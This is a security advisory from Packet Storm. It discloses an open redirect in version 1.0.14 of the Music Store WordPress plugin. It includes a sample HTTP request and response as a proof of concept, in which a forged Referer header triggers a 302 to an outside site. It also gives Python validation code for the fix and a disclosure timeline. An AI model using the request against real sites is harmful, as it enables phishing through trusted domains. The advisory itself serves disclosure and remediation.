WordPress Music Store 1.0.14 Open Redirect

2015-07-26T00:00:00
ID PACKETSTORM:132841
Type packetstorm
Reporter Nitin Venkatesh
Modified 2015-07-26T00:00:00

Description

# Title: Open Redirect Vulnerability in Music Store Wordpress Plugin v1.0.14  
# Submitter: Nitin Venkatesh  
# Product: Music Store Wordpress Plugin  
# Product URL: https://wordpress.org/plugins/music-store/  
# Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect') [CWE-601]  
# Affected Versions: v1.0.14 and possibly below.  
# Tested versions: v1.0.14  
# Fixed Version: v1.0.15  
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178058/  
# Changelog: https://wordpress.org/plugins/music-store/changelog/  
# CVE Status: None & Fresh  
  
## Product Information:  
  
Music Store is an online store for selling audio files: music, speeches,  
narratives, everything audio. Payments in Music Store are taken through PayPal.  
  
## Vulnerability Description:  
  
ms-core/ms-submit.php redirects the client to the value of the HTTP Referer  
header without validating it. Because the Referer is attacker-controlled, the  
script can be made to issue a 302 to any external site, which is an open  
redirect.  
  
## Proof of Concept:  
  
Sample HTTP Request:  
  
```http
GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://google.com/
Connection: keep-alive
```
  
Sample HTTP Response:  
  
```http
HTTP/1.1 302 Found
Date: Fri, 05 Jun 2015 15:29:19 GMT
location: https://google.com/
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
```
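  
The validation the vulnerable handler lacked, shown as an added example in Python (not the plugin's PHP and not the project's code): a redirect target taken from the Referer is accepted only when it is a site-relative path or an absolute http(s) URL whose host equals the request's own Host; anything else falls back to an assumed landing page of "/". It is run against a constructed copy of the sample request above, so the off-site Referer yields a Location of "/" instead of https://google.com/.  
  
```python
from typing import Optional
from urllib.parse import urlsplit

# Constructed copy of the advisory's sample request: the Referer points off-site.
SAMPLE_REQUEST = (
    "GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "Referer: https://google.com/\r\n"
    "Connection: keep-alive\r\n\r\n"
)

def safe_redirect_target(candidate: Optional[str], site_host: str, fallback: str = "/") -> str:
    """Return candidate only if it stays on site_host; otherwise return fallback."""
    if not candidate:
        return fallback
    # Browsers treat a backslash like a slash; normalise so "/\evil" parses as "//evil".
    cleaned = candidate.strip().replace("\\", "/")
    # CR/LF or other control characters in a Location value would permit header injection.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in cleaned):
        return fallback
    try:
        parts = urlsplit(cleaned)
    except ValueError:  # e.g. a malformed IPv6 literal
        return fallback
    if parts.scheme == "" and parts.netloc == "":
        # Site-relative path: exactly one leading "/" ("//host" is scheme-relative).
        return cleaned if cleaned.startswith("/") and not cleaned.startswith("//") else fallback
    if parts.scheme.lower() not in ("http", "https"):
        return fallback  # javascript:, data: and similar schemes
    # .hostname drops userinfo and port, so "https://localhost@evil.example" yields "evil.example".
    if parts.hostname is None or parts.hostname.lower() != site_host.lower():
        return fallback
    return cleaned

def header_value(raw_request: str, name: str) -> Optional[str]:
    """Return the first value of header `name` from a raw HTTP/1.1 request, or None."""
    for line in raw_request.split("\r\n")[1:]:
        if not line:  # blank line ends the header section
            break
        key, _, value = line.partition(":")
        if key.strip().lower() == name.lower():
            return value.strip()
    return None

def location_for_request(raw_request: str) -> str:
    """Location a hardened ms-submit.php-style handler would send for raw_request."""
    host = urlsplit("//" + (header_value(raw_request, "Host") or "")).hostname or ""
    return safe_redirect_target(header_value(raw_request, "Referer"), host)
```
  
The host comparison is exact, so a subdomain such as localhost.evil.example is rejected along with userinfo and scheme-relative tricks; WordPress code should reach for wp_safe_redirect() rather than reimplementing this, but the checks above are what that function has to make.  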
  
## Solution:  
  
Upgrade to v1.0.15 (the fix is visible in the code diff linked above).  
  
## Disclosure Timeline:  
  
2015-06-05 - Discovered. Contacted developer.  
2015-06-10 - Fixed version v1.0.15 released.  
2015-07-25 - Disclosure published on the Full Disclosure (FD) mailing list.  
  
## Disclaimer:  
  
This disclosure is purely meant for educational purposes. I will in no way  
be responsible as to how the information in this disclosure is used.  
  